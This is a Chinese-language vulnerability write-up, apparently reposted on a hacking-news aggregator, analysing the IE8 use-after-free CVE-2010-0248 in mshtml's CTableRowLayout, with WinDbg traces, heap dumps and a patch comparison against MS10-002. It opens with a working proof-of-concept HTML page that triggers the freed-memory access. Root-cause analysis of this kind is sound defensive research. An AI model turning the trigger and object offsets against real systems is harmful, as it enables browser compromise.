记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

CVE-2010-0248 CTableRowLayout释放后重用

2013-12-02 19:30
1.  POC

<html>
<body>
<table id="test"> <tr></tr> </table>
<script>
Math.tan(2,3);
var test = document.getElementById("test");
Math.sin(0);
var x = test.cells.item(0);
Math.cos(0);
test.outerText = 'test text'; // 删除表格
Math.tan(2,3);
x = test.cells.item(0); // 再试图引用表格的元素,此时将访问已释放的内存
</script>
</body>
</html>

 

 
2.  基本知识点
 
每个CTable对象都包含一个CCollectionCache元素,用于缓存CTable的一些内容。

CTable:
+x2c pCCollectionCache

CCollectionCache可以看作是一个动态的数组。初始的大小包含三个元素。元素的类型由下面的变量确定。
enum
{
TABLE_ROWS_COLLECTION = 0, // CTableRowsCollectionCacheItem
TABLE_BODYS_COLLECTION = 1,// CTableBodysCollectionCacheItem
TABLE_CELLS_COLLECTION = 2,// CTableCellsCollectionCacheItem
NUMBER_OF_TABLE_COLLECTION = 3,
};

CTableCellsCollectionCacheItem
+x0c pCTableRowLayout
+x1c pCTableLayout

 
 
3.  元素的创建
3.1  CCollectionCache的创建
在第一次调用CTable::get_cells时,回去创建CCollectionCache元素。
CCollectionCache对象的地址为5f6afd0。
var x = test.cells.item(0);
 

 

0:008> kv
ChildEBP RetAddr Args to Child
03f5f30c 6399f521 05f54fb8 04480f00 63aaf45c mshtml!CTable::EnsureCollectionCache+0x7c
03f5f328 636237bb 05f54fb8 04480f00 0448efd0 mshtml!CTable::get_cells+0x47
03f5f348 636430c9 05f54fb8 0448efd0 05e4efd8 mshtml!G_IDispatchp+0x7b
03f5f3bc 6366418a 05f54fb8 0000040d 00000001 mshtml!CBase::ContextInvokeEx+0x5d1
03f5f40c 63768436 05f54fb8 0000040d 00000001 mshtml!CElement::ContextInvokeEx+0x9d
03f5f450 63642eec 05f54fb8 0000040d 00000001 mshtml!CTable::VersionedInvokeEx+0xbe
03f5f4a0 633a6d37 05484fd8 0000040d 00000001 mshtml!PlainInvokeEx+0xea
03f5f4e0 633a6c75 04412d10 0000040d 00000409 jscript!IDispatchExInvokeEx2+0xf8
03f5f51c 633a9cfe 04412d10 00000409 00000002 jscript!IDispatchExInvokeEx+0x6a
03f5f5dc 633a9f3c 0000040d 00000002 04480f80 jscript!InvokeDispatchEx+0x98
03f5f610 633a99b7 04412d10 03f5f738 00000002 jscript!VAR::InvokeByName+0x135
03f5f7a8 633a5ab0 03f5f7c0 03f5f908 03f5f908 jscript!CScriptRuntime::Run+0x655
03f5f890 633a59f7 03f5f908 00000000 00000000 jscript!ScrFncObj::CallWithFrameOnStack+0xff
03f5f8dc 633a5743 03f5f908 00000000 00000000 jscript!ScrFncObj::Call+0x8f
03f5f958 633891f1 0447ef88 03f5fb18 00000000 jscript!CSession::Execute+0x175
03f5f9a4 63388f65 043f2df0 03f5fb18 03f5fb28 jscript!COleScript::ExecutePendingScripts+0x1c0
03f5fa08 63388d7f 043f2df0 04596fec 635be83c jscript!COleScript::ParseScriptTextCore+0x29a
03f5fa30 635bf025 043f2df4 061f6e34 04596fec jscript!COleScript::ParseScriptText+0x30
03f5fa88 635be7ca 04d5cfa8 00000000 0641ef30 mshtml!CScriptCollection::ParseScriptText+0x219
03f5fb4c 635be5ab 00000000 00000000 00000000 mshtml!CScriptElement::CommitCode+0x3a9
03f5fb80 635ac020 7c80932e 0548afb0 0548afb0 mshtml!CScriptElement::Execute+0xc4
03f5fbd4 635a74f0 054ddf08 7c80932e 0548afb0 mshtml!CHtmParse::Execute+0x4a
03f5fbec 635a7266 635a6a75 38152f9f 0548afb0 mshtml!CHtmPost::Broadcast+0xf
03f5fcac 635ac2b8 38152f9f 00000000 0548afb0 mshtml!CHtmPost::Exec+0x5f6
03f5fcc4 635ac21b 38152f9f 00000000 0548afb0 mshtml!CHtmPost::Run+0x15
03f5fce4 635ac17e 04d60d58 38152f9f 0548afb0 mshtml!PostManExecute+0x1fd
03f5fd04 635ac0e2 00000001 00000012 03f5fd24 mshtml!PostManResume+0xf8
03f5fd14 63655d60 054c9f98 0548afb0 03f5fd58 mshtml!CHtmPost::OnDwnChanCallback+0x10
03f5fd24 6364de62 054c9f98 00000000 04d60d58 mshtml!CDwnChan::OnMethodCall+0x19
03f5fd58 6363c3c5 03f5fde0 6363c317 00000000 mshtml!GlobalWndOnMethodCall+0xfb
03f5fd78 77d18734 0075026c 0000000f 00000000 mshtml!GlobalWndProc+0x183
03f5fda4 77d18816 6363c317 0075026c 00008002 USER32!InternalCallWinProc+0x28
03f5fe0c 77d189cd 00000000 6363c317 0075026c USER32!UserCallWinProcCheckWow+0x150 (FPO: [Non-Fpo])
03f5fe6c 77d18a10 03f5fe94 00000000 03f5feec USER32!DispatchMessageWorker+0x306 (FPO: [Non-Fpo])
03f5fe7c 02692ec9 03f5fe94 00000000 01cbaf58 USER32!DispatchMessageW+0xf (FPO: [Non-Fpo])
03f5feec 026348bf 045da808 0040128e 03746ff0 IEFRAME!CTabWindow::_TabWindowThreadProc+0x461 (FPO: [Non-Fpo])
03f5ffa4 5de05a60 01cbaf58 7c817067 03f5ffec IEFRAME!LCIETab_ThreadProc+0x2c1 (FPO: [Non-Fpo])
03f5ffb4 7c80b713 03746ff0 0040128e 7c817067 iertutil!CIsoScope::RegisterThread+0xab (FPO: [Non-Fpo])
03f5ffec 00000000 5de05a52 03746ff0 00000000 kernel32!BaseThreadStart+0x37 (FPO: [Non-Fpo])

CCollectionCache对象数组的内部结构:
CCollectionCache
+x08 数组的大小
+0c 数组的地址

 
每个元素的大小为3c。
 

dc 5f6afd0
05f6afd0 6363332c 00000018 00000006 05fdee98 ,3cc............
05f6afe0 00000006 05f54fb8 63991759 00000000 .....O..Y..c....
05f6aff0 00000000 00000000 0641ef30 0641afe8 ........0.A...A.

 
 
3.1.1  元素0  CTableRowsCollectionCacheItem

dc 05fdee98 l3c/4
05fdee98 00000000 00000000 060bcff0 00000000 ................
05fdeea8 00000000 00000000 ffffffff 00000000 ................
05fdeeb8 00000000 00000000 00000002 00000000 ................
05fdeec8 000f4240 002dc6bf 00000000 @B....-.....
0:008> !heap -p -a 060bcff0
address 060bcff0 found in
_DPH_HEAP_ROOT @ 151000
in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)
5fad2c0: 60bcff0 10 - 60bc000 2000
mshtml!CTableRowsCollectionCacheItem::`vftable'
7c938f01 ntdll!RtlAllocateHeap+0x00000e64
63991609 mshtml!CTable::EnsureCollectionCache+0x00000174
6399f521 mshtml!CTable::get_cells+0x00000047
636237bb mshtml!G_IDispatchp+0x0000007b
636430c9 mshtml!CBase::ContextInvokeEx+0x000005d1
6366418a mshtml!CElement::ContextInvokeEx+0x0000009d
63768436 mshtml!CTable::VersionedInvokeEx+0x000000be
63642eec mshtml!PlainInvokeEx+0x000000ea
633a6d37 jscript!IDispatchExInvokeEx2+0x000000f8
633a6c75 jscript!IDispatchExInvokeEx+0x0000006a
633a9cfe jscript!InvokeDispatchEx+0x00000098
633a9f3c jscript!VAR::InvokeByName+0x00000135
633a99b7 jscript!CScriptRuntime::Run+0x00000655
633a5ab0 jscript!ScrFncObj::CallWithFrameOnStack+0x000000ff
633a59f7 jscript!ScrFncObj::Call+0x0000008f
633a5743 jscript!CSession::Execute+0x00000175

dc 060bcff0
060bcff0 639916fc 00000000 05440ea8 00000000 ...c......D.....

 
3.1.2  元素1 CTableBodysCollectionCacheItem

0:008> dc 05fdee98 + 3c l3c/4
05fdeed4 00000000 00000000 060dcff0 00000000 ................
05fdeee4 00000000 00000000 ffffffff 00000000 ................
05fdeef4 00000000 00000000 00000002 00000000 ................
05fdef04 000f4240 002dc6bf 00000000 @B....-.....
0:008> !heap -p -a 060dcff0
address 060dcff0 found in
_DPH_HEAP_ROOT @ 151000
in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)
5faff48: 60dcff0 c - 60dc000 2000
mshtml!CTableBodysCollectionCacheItem::`vftable'
7c938f01 ntdll!RtlAllocateHeap+0x00000e64
63991650 mshtml!CTable::EnsureCollectionCache+0x000001bb
6399f521 mshtml!CTable::get_cells+0x00000047
636237bb mshtml!G_IDispatchp+0x0000007b
636430c9 mshtml!CBase::ContextInvokeEx+0x000005d1
6366418a mshtml!CElement::ContextInvokeEx+0x0000009d
63768436 mshtml!CTable::VersionedInvokeEx+0x000000be
63642eec mshtml!PlainInvokeEx+0x000000ea
633a6d37 jscript!IDispatchExInvokeEx2+0x000000f8
633a6c75 jscript!IDispatchExInvokeEx+0x0000006a
633a9cfe jscript!InvokeDispatchEx+0x00000098
633a9f3c jscript!VAR::InvokeByName+0x00000135
633a99b7 jscript!CScriptRuntime::Run+0x00000655
633a5ab0 jscript!ScrFncObj::CallWithFrameOnStack+0x000000ff
633a59f7 jscript!ScrFncObj::Call+0x0000008f
633a5743 jscript!CSession::Execute+0x00000175

 
3.1.3   元素3 CTableCellsCollectionCacheItem
 


0:008> dc 05fdee98 + 2*3c l3c/4
05fdef10 00000000 00000000 0613cfd8 00000000 ................
05fdef20 00000000 00000000 ffffffff 00000000 ................
05fdef30 00000000 00000000 00000002 00000000 ................
05fdef40 000f4240 002dc6bf 00000000 @B....-.....
0:008> !heap -p -a 0613cfd8
address 0613cfd8 found in
_DPH_HEAP_ROOT @ 151000
in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)
5fadce8: 613cfd8 24 - 613c000 2000
mshtml!CTableCellsCollectionCacheItem::`vftable'
7c938f01 ntdll!RtlAllocateHeap+0x00000e64
63991694 mshtml!CTable::EnsureCollectionCache+0x000001ff
6399f521 mshtml!CTable::get_cells+0x00000047
636237bb mshtml!G_IDispatchp+0x0000007b
636430c9 mshtml!CBase::ContextInvokeEx+0x000005d1
6366418a mshtml!CElement::ContextInvokeEx+0x0000009d
63768436 mshtml!CTable::VersionedInvokeEx+0x000000be
63642eec mshtml!PlainInvokeEx+0x000000ea
633a6d37 jscript!IDispatchExInvokeEx2+0x000000f8
633a6c75 jscript!IDispatchExInvokeEx+0x0000006a
633a9cfe jscript!InvokeDispatchEx+0x00000098
633a9f3c jscript!VAR::InvokeByName+0x00000135
633a99b7 jscript!CScriptRuntime::Run+0x00000655
633a5ab0 jscript!ScrFncObj::CallWithFrameOnStack+0x000000ff
633a59f7 jscript!ScrFncObj::Call+0x0000008f
633a5743 jscript!CSession::Execute+0x00000175


0:008> dc 0613cfd8
0613cfd8 639916d0 00000000 00000000 00000000 ...c............
0613cfe8 00000000 00000000 00000000 05440ea8 ..............D.
0613cff8 00000000 d0d0d0d0 ???????? ???????? ........????????

 
3.2  CTableRowLayout创建
 

0:008> !heap -p -a 054a2fa0
address 054a2fa0 found in
_DPH_HEAP_ROOT @ 151000
in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)
5facf78: 54a2fa0 5c - 54a2000 2000
mshtml!CTableRowLayout::`vftable'
7c938f01 ntdll!RtlAllocateHeap+0x00000e64
635d10a6 mshtml!GetLayoutFromFactory+0x00000695
635e8717 mshtml!CElement::CreateLayout+0x00000021
6359fab8 mshtml!CTableRow::RowLayoutCache+0x00000042
6359f6a5 mshtml!CTableRow::Notify+0x00000174
635a7f46 mshtml!CHtmRootParseCtx::FlushNotifications+0x000001be
635a77d9 mshtml!CHtmRootParseCtx::Commit+0x0000000a
635a74f0 mshtml!CHtmPost::Broadcast+0x0000000f
635a7388 mshtml!CHtmPost::Exec+0x00000255
635ac2b8 mshtml!CHtmPost::Run+0x00000015
635ac21b mshtml!PostManExecute+0x000001fd
635ac17e mshtml!PostManResume+0x000000f8
635ac0e2 mshtml!CHtmPost::OnDwnChanCallback+0x00000010
63655d60 mshtml!CDwnChan::OnMethodCall+0x00000019
6364de62 mshtml!GlobalWndOnMethodCall+0x000000fb
6363c3c5 mshtml!GlobalWndProc+0x00000183

 
CTableRowLayout过程如上所述。
 
在后面的调用过程中,该地址会保存在CTableCellsCollectionCacheItem 0613cfd8  元素中。
 

0:008> dc 0613cfd8
0613cfd8 639916d0 00000000 00000000 054a2fa0 ...c........./J.
0613cfe8 00000000 00000000 00000000 05440ea8 ..............D.
0613cff8 00000000 d0d0d0d0 ???????? ???????? ........????????


03f5f3f8 6399109b 00000000 00000000 00000078 mshtml!CTableCellsCollectionCacheItem::SetCurrentRowAndGetRowIndex+0x43
03f5f40c 635e7aa7 00000000 00000000 05f6afd0 mshtml!CTableCellsCollectionCacheItem::MoveTo+0x15
03f5f458 635e7b76 05f6afd0 04420c48 00000004 mshtml!CCollectionCache::GetIntoAry+0x47
03f5f49c 635e7c20 00000002 04420c48 03f5f588 mshtml!CCollectionCache::GetDispID+0x13e
03f5f4b0 635d36b0 05f6afd0 00000002 04420c48 mshtml!DispatchGetDispIDCollection+0x3f
03f5f4d8 63643d3e 06140fd8 04420c48 10000001 mshtml!CElementCollectionBase::VersionedGetDispID+0x46
03f5f518 633a9eb2 05e4efd8 04420c48 10000001 mshtml!PlainGetDispID+0xdc
03f5f548 633a9e13 04420c48 03f5f588 05e4efd8 jscript!IDispatchExGetDispID+0xb7
03f5f564 633a9f17 04412d10 03f5f588 00000001 jscript!GetDex2DispID+0x34
03f5f590 633a77ff 04412d10 03f5f5c4 00000003 jscript!VAR::InvokeByName+0xeb
03f5f5dc 633a85c7 04412d10 00000003 03f5f760 jscript!VAR::InvokeDispName+0x7a
03f5f60c 633a83a9 04412d10 00000000 00000003 jscript!VAR::InvokeByDispID+0xce
03f5f7a8 633a5ab0 03f5f7c0 03f5f908 03f5f908 jscript!CScriptRuntime::Run+0x28ab
03f5f890 633a59f7 03f5f908 00000000 00000000 jscript!ScrFncObj::CallWithFrameOnStack+0xff
03f5f8dc 633a5743 03f5f908 00000000 00000000 jscript!ScrFncObj::Call+0x8f
03f5f958 633891f1 0447ef88 03f5fb18 00000000 jscript!CSession::Execute+0x175
03f5f9a4 63388f65 043f2df0 03f5fb18 03f5fb28 jscript!COleScript::ExecutePendingScripts+0x1c0
03f5fa08 63388d7f 043f2df0 04596fec 635be83c jscript!COleScript::ParseScriptTextCore+0x29a
03f5fa30 635bf025 043f2df4 061f6e34 04596fec jscript!COleScript::ParseScriptText+0x30
03f5fa88 635be7ca 04d5cfa8 00000000 0641ef30 mshtml!CScriptCollection::ParseScriptText+0x219
03f5fb4c 635be5ab 00000000 00000000 00000000 mshtml!CScriptElement::CommitCode+0x3a9
03f5fb80 635ac020 7c80932e 0548afb0 0548afb0 mshtml!CScriptElement::Execute+0xc4
03f5fbd4 635a74f0 054ddf08 7c80932e 0548afb0 mshtml!CHtmParse::Execute+0x4a
03f5fbec 635a7266 635a6a75 38152f9f 0548afb0 mshtml!CHtmPost::Broadcast+0xf
03f5fcac 635ac2b8 38152f9f 00000000 0548afb0 mshtml!CHtmPost::Exec+0x5f6
03f5fcc4 635ac21b 38152f9f 00000000 0548afb0 mshtml!CHtmPost::Run+0x15
03f5fce4 635ac17e 04d60d58 38152f9f 0548afb0 mshtml!PostManExecute+0x1fd
03f5fd04 635ac0e2 00000001 00000012 03f5fd24 mshtml!PostManResume+0xf8
03f5fd14 63655d60 054c9f98 0548afb0 03f5fd58 mshtml!CHtmPost::OnDwnChanCallback+0x10
03f5fd24 6364de62 054c9f98 00000000 04d60d58 mshtml!CDwnChan::OnMethodCall+0x19
03f5fd58 6363c3c5 03f5fde0 6363c317 00000000 mshtml!GlobalWndOnMethodCall+0xfb
03f5fd78 77d18734 0075026c 0000000f 00000000 mshtml!GlobalWndProc+0x183
03f5fda4 77d18816 6363c317 0075026c 00008002 USER32!InternalCallWinProc+0x28
03f5fe0c 77d189cd 00000000 6363c317 0075026c USER32!UserCallWinProcCheckWow+0x150 (FPO: [Non-Fpo])
03f5fe6c 77d18a10 03f5fe94 00000000 03f5feec USER32!DispatchMessageWorker+0x306 (FPO: [Non-Fpo])
03f5fe7c 02692ec9 03f5fe94 00000000 01cbaf58 USER32!DispatchMessageW+0xf (FPO: [Non-Fpo])
03f5feec 026348bf 045da808 0040128e 03746ff0 IEFRAME!CTabWindow::_TabWindowThreadProc+0x461 (FPO: [Non-Fpo])
03f5ffa4 5de05a60 01cbaf58 7c817067 03f5ffec IEFRAME!LCIETab_ThreadProc+0x2c1 (FPO: [Non-Fpo])
03f5ffb4 7c80b713 03746ff0 0040128e 7c817067 iertutil!CIsoScope::RegisterThread+0xab (FPO: [Non-Fpo])
03f5ffec 00000000 5de05a52 03746ff0 00000000 kernel32!BaseThreadStart+0x37 (FPO: [Non-Fpo])

4.  CTableRowLayout元素的释放
当poc运行到如下的语句时,会导致cell的释放,同时会导致与其相关的CTableRowLayout的释放。
test.outerText = 'test text'; // 删除表格
 

 
dc edi
054a2fa0  63631fa8 0641afe8 00000000 6363a558  ..cc..A.....X.cc
054a2fb0  00008000 00000000 00080809 ffffffff  ................
054a2fc0  00000000 00000000 00000000 ffffffff  ................
054a2fd0  ffffffff ffffffff 00000000 6363332c  ............,3cc
054a2fe0  00000000 00000000 00000000 00000000  ................
054a2ff0  00000000 00000000 00000000 d0d0d0d0  ................
 

 
元素释放后,并没有同时更新对应的CTableCellsCollectionCacheItem元素。
可以看到,CTableCellsCollectionCacheItem +x0c 处仍然指向被释放的CTableRowLayout。

dc 0613cfd8
0613cfd8 639916d0 00000000 00000000 054a2fa0 ...c........./J.
0613cfe8 ffffffff ffffffff ffffffff 05440ea8 ..............D.
0613cff8 00000001 d0d0d0d0 ???????? ???????? ........????????

 
5.  重用
当poc运行到该语句时,
x = test.cells.item(0);
会通过CTable的CCollectionCache来查询元素,由于CTableCellsCollectionCacheItem元素包含了已经释放的元素,导致释放后重用。

Edi指向CTableCellsCollectionCacheItem,eax为edi+0c处的内容,即CTableRowLayout对象地址,由于该地址已经释放。所以在下面引用该地址eax+54的值时,导致内存访问错误。
dc eax
054a2fa0  ???????? ???????? ???????? ????????  ????????????????
054a2fb0  ???????? ???????? ???????? ????????  ????????????????
054a2fc0  ???????? ???????? ???????? ????????  ????????????????
054a2fd0  ???????? ???????? ???????? ????????  ????????????????
054a2fe0  ???????? ???????? ???????? ????????  ????????????????

 
6.  补丁对比
6.1  补丁前(IE8)
调用链如下:
CCollectionCache::GetIntoAry
         CTableCellsCollectionCacheItem::MoveTo
         CTableCellsCollectionCacheItem::GetNext

在执行MoveTo时,会调用如下的函数。

该函数会在CTableCellsCollectionCacheItem对应的1c处的元素即CTableLayout的0x128处的值处理后进行判断是否为0,如果为0,则返回负-1。
在进行到GetNext时,

edi表示this指针,
         先获得0c处的值,即CTableRowLayout对象,从上面可以看到,该值不为空,所以会进行到处,
        
由于eax指向的对象已经释放,导致释放后重用。
 
6.2  补丁后(MS10-002 mshtml 8.0.6001.18876)
 
调用链如下:
CCollectionCache::GetIntoAry
         CTableCellsCollectionCacheItem::MoveTo
         CTableCellsCollectionCacheItem::GetNext
 

 
在执行MoveTo时,会调用如下的函数。

该函数会在CTableCellsCollectionCacheItem对应的1c处的元素即CTableLayout的0x128处的值〉〉2后的值(Cells的数目)是否为0,如果为0:
与补丁前对比:
会将pCTableCellsCollectionCacheItem 0c处设置为0。
然后返回负-1。
在进行到GetNext时,

edi表示this指针,
         先获得0c处的值,即CTableRowLayout对象,从上面可以看到,在MoveTo时,该处的值被设置为空,和补丁前对比,此时会进入到另一个分支,不会导致内存访问异常问题。
 
6.3  结论
CTable中会用CCollectionCache对象来缓存CTable的一些内容。
在缓存CTableCellsCollectionCacheItem对象时,当表格中的内容被情况时,对应的Row的CTableRowLayout会被清空,但未补丁前,CTableCellsCollectionCacheItem项中的0xc处仍然指现被释放的CTableRowLayout,导致释放后重用。
补丁后,如果如果发现CTableRowLayout对应的CTableLayout +x128处的值为0,则会将CTableCellsCollectionCacheItem +x0c处的值清0。
知识来源: www.2cto.com/Article/201312/261070.html

阅读:83034 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“CVE-2010-0248 CTableRowLayout释放后重用”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云